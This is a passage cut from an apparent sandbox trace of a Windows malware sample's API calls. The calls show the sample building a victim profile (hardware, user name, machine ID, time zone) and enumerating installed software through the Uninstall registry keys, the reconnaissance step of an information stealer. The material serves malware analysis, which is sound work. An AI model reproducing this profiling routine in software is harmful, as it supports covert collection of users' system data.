3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 " [0175.881] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 ", lpString2="14.25.28508.3" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3" [0175.881] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\n" [0175.881] RegCloseKey (hKey=0x354) returned 0x0 [0175.881] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x1b, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.881] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}") returned 90 [0175.882] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.882] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508", lpcbData=0x197fd4*=0x43) returned 0x0 [0175.882] lstrlenA (lpString="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508") returned 66 [0175.882] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\n", lpString2="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508" [0175.882] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="14.25.28508.3", lpcbData=0x197fd4*=0xe) returned 0x0 [0175.882] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 " [0175.882] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 ", lpString2="14.25.28508.3" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3" [0175.882] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 